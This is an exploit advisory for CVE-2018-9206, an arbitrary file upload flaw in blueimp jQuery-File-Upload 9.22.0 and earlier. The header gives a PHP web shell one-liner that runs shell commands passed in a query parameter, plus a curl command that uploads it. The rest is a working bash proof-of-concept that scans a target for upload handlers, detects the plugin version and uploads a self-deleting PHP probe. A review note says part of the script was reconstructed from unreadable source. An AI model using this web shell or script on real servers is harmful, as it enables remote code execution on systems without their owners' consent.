# Title: jQuery-File-Upload 9.22.0 - Arbitrary File Upload
# Author: Larry W. Cashdollar, @_larry0
# Date: 2018-10-09
# Vendor: https://github.com/blueimp
# Download Site: https://github.com/blueimp/jQuery-File-Upload/releases
# CVE-ID: N/A at time of writing (the PoC banner below refers to CVE-2018-9206)
# Vulnerability:
# The upload handler in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php
# does not require any validation (or credentials) to upload files to the server, and it does not
# restrict file types. A PHP file can therefore be uploaded and then executed by the web server,
# which allows for remote code execution. The banner below names Apache > 2.3.9 with
# AllowOverride None as the affected configuration.
# shell.php:<?php $cmd=$_GET['cmd']; system($cmd);?>
# Exploit Code:
$ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
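#!/bin/bash
# PoC for CVE-2018-9206 (blueimp jQuery-File-Upload <= 9.22.0): probes a target
# for the bundled PHP upload handler and uploads a harmless, self-deleting PHP
# file to confirm that arbitrary file types are accepted.
#
# Usage: ./poc.sh http://www.example.com
#
# Changes from the original @_larry0 PoC (per the script's own notes):
# - a bit of refactoring
# - use the name the server actually stored the file under (e.g. 'file (1).php')
# - try to detect the plugin version (bower.json / package.json)
# - try to detect index.html (the GUI that also allows uploads)
#
# No `set -e`: the probing requests are expected to fail for most candidate
# paths and their exit codes are inspected inline. Run this only against
# systems you are authorised to test.

# User-Agent sent with every request (a plain desktop browser string).
readonly USERAGENT="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

# Candidate locations of the upload handler. ORDER MATTERS: the index of the
# first path that answers 200 is mapped to the upload endpoint further down
# (0,2 -> server/php/index.php; 1 -> example/upload.php; 3 -> php/index.php).
readonly PATHS=(
  "server/php/upload.class.php"
  "example/upload.php"
  "server/php/UploadHandler.php"
  "php/index.php"
)

# Random 12-character alphanumeric name for the probe file, so repeated runs
# do not collide with an earlier upload on the target. LC_ALL=C keeps tr
# byte-wise on /dev/urandom (non-C locales can reject bytes as invalid chars).
MALICIOUS_FILE="$(LC_ALL=C tr -dc 'a-zA-Z0-9' </dev/urandom | head -c 12).php"
readonly MALICIOUS_FILE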
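#######################################
# Abort with an install hint unless the named tool is on PATH.
# Arguments: $1 - executable name
# Outputs:   error text on stderr
# Returns:   0 when found; exits 1 when missing
#######################################
require_tool() {
  # command -v only looks the name up; the original ran `tool -h`, which
  # executes it just to learn whether it exists.
  if ! command -v -- "$1" >/dev/null 2>&1; then
    printf '[!] Please install %s.\n# apt install %s\n' "$1" "$1" >&2
    exit 1
  fi
}

# curl performs every request; jq parses the upload handler's JSON replies.
require_tool curl
require_tool jq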
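# Checking url: a target base URL is mandatory (e.g. http://www.example.com).
# Quoted so that an argument containing spaces cannot break the test.
if [ -z "${1:-}" ]; then
  printf '[!] Please supply a target host as an argument.\n' >&2
  printf '%s http://www.example.com\n' "$0" >&2
  exit 1
fi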
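# Generating payload: a PHP file that prints a marker and then deletes itself,
# so a successful probe leaves nothing behind on the target. If the target
# stores the file but does not execute PHP, the file stays there — remember
# that when probing anything other than a lab system.
printf '%s\n' '<?php echo "it works"; unlink(__FILE__); ?>' > "${MALICIOUS_FILE:?}"
# Remove the local copy on every exit path (early exits included), not only at
# the end of a successful run.
trap '[ -n "${MALICIOUS_FILE:-}" ] && rm -f -- "${MALICIOUS_FILE}"' EXIT

# Banner. Per the last line, the affected setup is Apache > 2.3.9 with
# AllowOverride None — presumably because the plugin's own .htaccess
# restrictions are not honoured there; confirm against the vendor advisory.
cat <<'BANNER'
________________________________________________________________________________
|PoC Exploit for Blueimp's jQuery File Uploader CVE-2018-9206
|Checks for older versions of the code and upload an harmless file.
|
| @_larry0, @phackt_ul
|Works for version <= 9.22.0 and with Apache > 2.3.9 (AllowOverride None).
---/

BANNER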
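printf '[+] Checking variations :\n'

# Base URL as given on the command line, minus a trailing slash so the paths
# below are not joined with "//".
target="${1%/}"

# Shared curl invocation, kept as an ARRAY so the User-Agent (which contains
# spaces) survives as a single argument. The original string alias
# `curl='... -A "${USERAGENT}"'` never expanded USERAGENT (single quotes) and
# word-split the literal quotes into separate arguments, so the UA was not
# actually sent. -s silences progress output; -k skips TLS certificate
# verification (acceptable for a lab PoC, but a MITM could then feed fake
# replies).
curl_cmd=(curl --connect-timeout 10 -sk -A "${USERAGENT}")

# Looking for the upload php class file: index of the first path in PATHS that
# answers HTTP 200 (or -1 when none does).
index=-1
found=0
i=0
for path in "${PATHS[@]}"; do
  printf '[*] Testing... -> %s/%s\n' "${target}" "${path}"
  # -i prints the status line first; only a 200 counts (redirects do not,
  # since -L is not used).
  if "${curl_cmd[@]}" -i "${target}/${path}" | head -n 1 | grep -q '^HTTP/[0-9.]* 200'; then
    printf '[+] Found Path: %s\n' "${path}"
    index=$i
    found=1
    break
  fi
  i=$((i + 1))
done

if [ "${found}" -ne 1 ]; then
  printf '[!] ### Error: A vulnerable jQuery-File-Upload plugin was not found!\n' >&2
  exit 1
fi

# Determining the exploit path according to the jquery version: the layout the
# probe hit tells us which upload endpoint that release ships.
case "${index}" in
  0|2) exploit_path="server/php/index.php" ;;
  1)   exploit_path="example/upload.php" ;;
  3)   exploit_path="php/index.php" ;;
  *)   exploit_path="" ;;   # unreachable with the four PATHS above
esac

# Trying to detect bower.json, package.json: the first one carrying a .version
# field reveals the plugin release. (The original declared both names as ONE
# array element and only worked because the loop word-split it.)
version_files=("bower.json" "package.json")
for vf in "${version_files[@]}"; do
  # Non-JSON replies (404 pages) make jq fail: drop that noise and treat a
  # missing or null version the same as "not found".
  version=$("${curl_cmd[@]}" "${target}/${vf}" | jq -r '.version // empty' 2>/dev/null)
  if [ -n "${version}" ]; then
    printf '[!] Found: Plugin version %s\n' "${version}"
    break
  fi
done

# Trying to detect index.html: the demo page is a second upload channel (GUI).
if "${curl_cmd[@]}" "${target}/index.html" | grep -qi "jquery file upload"; then
  printf '[!] Found: %s/index.html is accessible\n' "${target}"
fi

# Uploading payload. The handler answers with JSON listing the stored file(s);
# the stored name can differ from the uploaded one (e.g. 'file (1).php' when
# the name is already taken), so it is read back from the reply.
printf '[+] Running %s -F "files[]=@%s" -F "filename=%s" "%s/%s"\n' \
  "${curl_cmd[*]}" "${MALICIOUS_FILE}" "${MALICIOUS_FILE}" "${target}" "${exploit_path}"
upload_json=$("${curl_cmd[@]}" -F "files[]=@${MALICIOUS_FILE}" -F "filename=${MALICIOUS_FILE}" \
  "${target}/${exploit_path}")
# NOTE(review): the source this was restored from was unreadable where the
# stored name is used below; ${filename} is the reconstruction implied by this
# jq call and by the URL-encoding that follows.
filename=$(printf '%s' "${upload_json}" | jq -r '.files[0].name // empty' 2>/dev/null)
if [ -z "${filename}" ]; then
  printf '[!] It seems that we had a false positive! :(\n' >&2
  exit 1
fi

# Only spaces are escaped: that is all the server's "name (1).php" renaming
# adds, and the rest of the name is our own alphanumeric string.
filename=${filename// /%20}

# Trying to see if victim has been exploited: uploads are served from a files/
# directory next to the endpoint; fetching the probe executes it, which prints
# the marker and unlinks the file.
probe_url="${target}/$(dirname "${exploit_path}")/files/${filename}"
printf '[+] Testing path: %s\n' "${probe_url}"
res=$("${curl_cmd[@]}" "${probe_url}")
if [ "${res}" = "it works" ]; then
  printf '[!] Found: %s is vulnerable\n' "${target}"
else
  # Likely either the upload was refused, or it was stored but not executed as
  # PHP — in the latter case the file is still on the target; remove it by hand.
  printf '[+] Seems not vulnerable :(\n'
fi
rm -f -- "${MALICIOUS_FILE}" >/dev/null 2>&1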